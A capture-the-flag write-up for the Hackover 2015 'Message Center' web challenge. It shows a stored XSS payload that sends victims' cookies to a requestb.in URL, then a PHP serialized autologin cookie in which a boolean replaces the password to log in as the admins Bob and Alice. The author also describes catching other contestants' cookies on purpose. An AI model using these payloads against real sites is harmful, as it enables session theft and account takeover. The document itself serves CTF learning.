English [Hackover 2015] [Web 100 – Message Center] Write Up

Description

Better than email! Use colors! And even more. Try us!

Resolution

It talks about colors so the first think is about an XSS vulnerability.

Go on the website :

http://messagecenter.hackover.h4q.it/index.php

We have a login page and two demo account. The first one demo/demo and a second one demo2/demo2.
We have an info that Bob an Alice are two admin on this website.

We connect with the first one and so we are on a page where we can send messages with four inputs (recipient, title, message and text message color).
We try to :
> send an empty message to ourselves (demo), an error occurs “Text should be at least 10 characters.”
> send a message to a false recipient (toto), an error occurs “Unknown recipient”
> send a message to Bob, Alice, demo and demo2, “Message was successfully sent”

So we can send messages to a website admin with color, and we can see we have a cookie PHPsessid without http only.
Let’s try to steal an admin cookie.
We send an XSS to Bob, Alice and to demo and demo2 (to test the XSS and capture other challengers ?).

<script>document.write('<IMG SRC="http://requestb.in/xxxxxxxx?cookie='+document.cookie+'">Poney</IMG>');</script>

We go look our message and see that the XSS runs good but we don’t capture any admin.
But, we capture some challengers and one of them looks interesting :

QUERYSTRING
cookie: PHPSESSID=mciinpq06ublod2ta30is3tdu4;
autologin=a:2:{s:8:"username";s:4:"demo";s:8:"password";s:40:"89e495e7941cf9e40e6980d14a16bf023ccd4c91";}

It show a cookie autologin with php serialisation, username “demo” and password we guess that is the sha1 hash of “demo”.

echo -n demo | sha1sum
89e495e7941cf9e40e6980d14a16bf023ccd4c91

In fact there was a “remember me” option on the login page.
So, as we know Bob and Alice are admin, we’ll try to connect us on those account with the autologin cookie.
We don’t know anything about Bob or Alice’s password so we use php serialisation vulnerability to replace the string password (s) to a boolean password (b).

a:2:{s:8:"username";s:3:"Bob";s:8:"password";b:1;}

We are successfully connected with Bob’s account.
But there are nothing really interesting in Bob’s messages, so we try to connect with Alice account.

a:2:{s:8:"username";s:5:"Alice";s:8:"password";b:1;}

We are successfully connected with Alice’s account.
One message looks very interesting :

Very important!
From: Bob
Very important!|This message will destroy itself in 10 seconds.
Rescue the flag: hackover15{typeSafetyToTheRescue}

Flag was hackover15{typeSafetyToTheRescue}

Leave a Reply

Your email address will not be published. Required fields are marked *